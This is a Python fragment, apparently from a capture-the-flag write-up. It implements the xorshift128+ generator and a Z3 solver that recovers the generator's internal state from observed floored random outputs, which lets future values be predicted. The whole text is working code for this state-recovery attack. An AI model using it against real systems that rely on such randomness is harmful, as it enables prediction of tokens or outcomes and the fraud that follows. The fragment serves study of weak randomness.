    s1 ^= (s1 << 23) & 0xFFFFFFFFFFFFFFFF
    s1 ^= (s1 >> 17) & 0xFFFFFFFFFFFFFFFF
    s1 ^= s0 & 0xFFFFFFFFFFFFFFFF
    s1 ^= (s0 >> 26) & 0xFFFFFFFFFFFFFFFF
    state0 = state1 & 0xFFFFFFFFFFFFFFFF
    state1 = s1 & 0xFFFFFFFFFFFFFFFF
    generated = (state0 + state1) & 0xFFFFFFFFFFFFFFFF
    return state0, state1, generated


def sym_xs128p(sym_state0, sym_state1):
    s1 = sym_state0
    s0 = sym_state1
    s1 ^= s1 << 23
    s1 ^= LShR(s1, 17)
    s1 ^= s0
    s1 ^= LShR(s0, 26)
    sym_state0 = sym_state1
    sym_state1 = s1
    return sym_state0, sym_state1


def sym_floor_random(slvr, sym_state0, sym_state1, generated, multiple):
    sym_state0, sym_state1 = sym_xs128p(sym_state0, sym_state1)

    calc = (sym_state0 + sym_state1) & BitVecVal((1 << 53) - 1, 64)

    coef = (1 << 53) / multiple
    lower = int(generated * coef)
    upper = int((generated + 1) * coef)

    slvr.add(ULE(BitVecVal(lower, 64), calc))
    slvr.add(ULE(calc, BitVecVal(upper, 64)))

    return sym_state0, sym_state1


def solve(points, multiple):
    ostate0, ostate1 = BitVecs("ostate0 ostate1", 64)
    sym_state0 = ostate0
    sym_state1 = ostate1
    set_option("parallel.enable", True)
    set_option("parallel.threads.max", max(cpu_count() - MAX_UNUSED_THREADS, 1))
    slvr = SolverFor("QF_BV")

    for point in points:
        sym_state0, sym_state1 = sym_floor_random(
            slvr, sym_state0, sym_state1, point, multiple
        )

    assert slvr.check() == sat

    m = slvr.model()
    state0 = m[ostate0].as_long()
    state1 = m[ostate1].as_long()
    return state0, state1


def to_double(value):
    return (value & ((1 << 53) - 1)) / (1 << 53)


def gen(seeds, multiple, count):
    state0, state1 = seeds
    points = []
    for _ in range(count):
        state0, state1, output = xs128p(state0, state1)
        points.append(math.floor(multiple * to_double(output)))
    return points
]]> writeup ctf